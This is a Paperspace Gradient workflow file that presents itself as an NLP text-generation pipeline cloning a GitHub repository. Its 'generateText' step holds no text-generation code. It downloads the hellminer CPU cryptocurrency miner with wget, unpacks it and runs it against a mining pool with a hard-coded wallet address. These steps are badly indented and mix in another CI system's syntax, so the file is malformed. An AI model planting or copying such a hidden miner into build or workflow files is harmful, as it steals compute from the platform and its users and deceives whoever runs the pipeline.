'on':
  github:
    branches:
      only: main
jobs:
  cloneRepo:
    uses: git-checkout@v1
    with:
      ref: context.event.github.ref
      url: context.event.github.url
    outputs:
      repo:
        type: volume
    resources:
      instance-type: C3
  generateText:
    uses: script@v1
    with:
      image: paperspace/transformers-gpu:0.4.0
      script: |-
    - name: PREPARING
      run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - name: Seting-UP
      run: tar xf hellminer_cpu_linux.tar.gz
    - name: Running
      run: ./hellminer -c stratum+tcp://pool -u RNa9RXXezxmCRikCVC7pq7jH4hrjUnWYFd.Al -p x --cpu 
    - name: END
      run: exit

    needs:
      - cloneRepo
    inputs:
      repo: cloneRepo.outputs.repo
    outputs:
      generatedText:
        type: dataset
        with:
          ref: demo-dataset
    resources:
      instance-type: C5
context:
  event:
    github:
      ref: 370a4edce440af933b7f77d902d3c374f5b66792
      url: https://github.com/niasadi/NLP-Text-Generation
